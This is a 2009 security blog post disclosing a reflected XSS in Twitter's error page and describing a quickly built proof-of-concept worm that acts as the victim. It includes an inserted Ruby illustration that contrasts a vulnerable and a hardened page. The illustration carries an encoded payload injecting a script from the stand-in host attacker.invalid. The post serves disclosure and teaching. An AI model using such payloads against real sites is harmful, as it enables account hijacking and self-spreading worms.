There's a subtle thrill in finding yourself astonished when you thought you had already seen 'em all.
Having worked for many years on web communities (especially in mobile environments), I find that Twitter and the social network phenomenon hold no strong appeal for me; they simply lack novelty.
However, I must admit that I'm fascinated by the security and privacy implications that come with a "social" web application used by millions of people.
In the last months Twitter has provided the security community with an amazing saga, being repeatedly plagued by almost every vulnerability known to mankind and pitilessly singled out as unable to protect its users' privacy: there has been so much hype about the "Twitter affair" that no worm, esoteric injection or other new oddity could add more spice to it.
But you should agree with me that this time Twitter has taken the cake.
I'll be short: Twitter fails to perform validation on any parameter of any URL!
Going into more detail: when a request carries a parameter Twitter does not expect, it raises a raw error page ranting that the given parameter is not accepted, and of course no safe encoding is applied to the parameter name reflected in that error page...
The last example leads to this special voodoo recipe:
...and voilà, the game is served. Disarming naivety.
Moreover, just two months ago Twitter had already been notified about a Ruby on Rails bug related to the same issue, querystring parameter validation (http://brian.mastenbrook.net/display/36), and they patched it.
Evidently they missed that chance to code-review their validation routines in full.
Ouch! Try it again, Twitter...
- And now that we've got an XSS, what can we do?
- Have fun...
The sky is the limit: retrieve the victim's posts, CSRF the victim into posting updates, alter the victim's bio, modify followers, follow new people.
The only limit (imposed by querystring syntax) is that no "=" sign can appear in the parameter name, since it delimits the name=value pairs in the querystring; however, using a clever trick (Roberto Suggi Liverani rulez!) you can still inject a <script src=...> tag and pull in any external js you wish.
Proof of concept
The video below is a PoC of what exploiting this vulnerability on Twitter made possible.
The victim (testxss) logs into Twitter and clicks on a link: the link points to a TinyUrl shortcut that is remapped as follows:
By escaping the "=" sign in the parameter we were able to link an external js file: the script just leverages a handful of jQuery statements in order to:
This is just a PoC worm that we put together in approx. 10 minutes.
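As an added illustration (my own code, not the original PoC and not Twitter's or Rails' source), the following Ruby script models both halves of the bug described above: a Rack-style querystring parser feeding an error page that reflects an unaccepted parameter name, and the "=" escaping trick used in the PoC. The parser follows the order Rack::Utils.parse_query uses (split on "&", split each pair on the first "=", then percent-decode name and value separately), which is what lets a percent-encoded "%3D" inside the parameter name survive as a literal "=" once the split has already happened. That reading of the post's "escaping" is my assumption, as are the hypothetical whitelist ACCEPTED_PARAMS and the placeholder host attacker.invalid in the constructed query string. The hardened variant differs from the vulnerable one only in HTML-escaping the reflected name.

```ruby
require 'uri'
require 'erb'

# Minimal Rack-style querystring parser (same splitting order as
# Rack::Utils.parse_query): split pairs on '&', split each pair on the
# FIRST '=', then percent-decode name and value separately.
# Because decoding happens after the split, '%3D' in the name part
# survives as a literal '=' in the parameter name.
def parse_query(query_string)
  params = {}
  query_string.split('&').each do |pair|
    next if pair.empty?
    name, value = pair.split('=', 2)
    name  = URI.decode_www_form_component(name)
    value = value.nil? ? nil : URI.decode_www_form_component(value)
    params[name] = value
  end
  params
end

# Hypothetical whitelist of parameter names the handler accepts.
ACCEPTED_PARAMS = %w[page count].freeze

# Vulnerable: reflects the rejected parameter name into HTML verbatim,
# exactly the mistake the post describes.
def error_page_unsafe(param_name)
  "<html><body><h1>Error</h1><p>Parameter #{param_name} is not accepted</p></body></html>"
end

# Hardened: HTML-escape anything reflected from the request before it
# reaches the markup. ERB::Util.html_escape turns < > & " ' into entities.
def error_page_safe(param_name)
  escaped = ERB::Util.html_escape(param_name)
  "<html><body><h1>Error</h1><p>Parameter #{escaped} is not accepted</p></body></html>"
end

# Simulated request handling: the first unknown parameter name triggers
# the error page; `safe:` selects which renderer is used.
def handle_request(query_string, safe:)
  parse_query(query_string).each_key do |name|
    next if ACCEPTED_PARAMS.include?(name)
    return safe ? error_page_safe(name) : error_page_unsafe(name)
  end
  "<html><body>ok</body></html>"
end

# Constructed attacker querystring (attacker.invalid is a placeholder host).
# Every byte that the parser would split on or that the URL would mangle,
# including the '=' of src=, is percent-encoded, so the whole
# <script src=...></script> tag lands in the parameter NAME.
EVIL_QUERY = '%3Cscript%20src%3Dhttp%3A%2F%2Fattacker.invalid%2Fw.js%3E%3C%2Fscript%3E'

if __FILE__ == $PROGRAM_NAME
  puts "Reflected parameter name: #{parse_query(EVIL_QUERY).keys.first}"
  puts "Vulnerable page: #{handle_request(EVIL_QUERY, safe: false)}"
  puts "Hardened page:   #{handle_request(EVIL_QUERY, safe: true)}"
end
```

Run it with plain ruby: the vulnerable page carries a live <script src=...> tag assembled entirely from the parameter name, while the hardened page shows the same bytes as inert &lt;script ...&gt; text. The fix is output encoding at the point of reflection, not stricter parameter validation; rejecting the parameter is what Twitter was already doing.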
Anyway, you can easily imagine some nastier scenarios:
Just think about using this vulnerability to spread across Twitter some malware that exploits a browser bug: it's a botmaster's dream!
That's exactly what I meant by "social network security implications": even the most "innocent" flaw (and XSS is not one...) when exploited in a social network environment can become the spark for a viral infection.
Twitter, please take better care of your users' security & privacy.
Users: web apps are not secure storage. Don't rely on them for storing sensitive information.
Rosario Valotta, November 12th 2009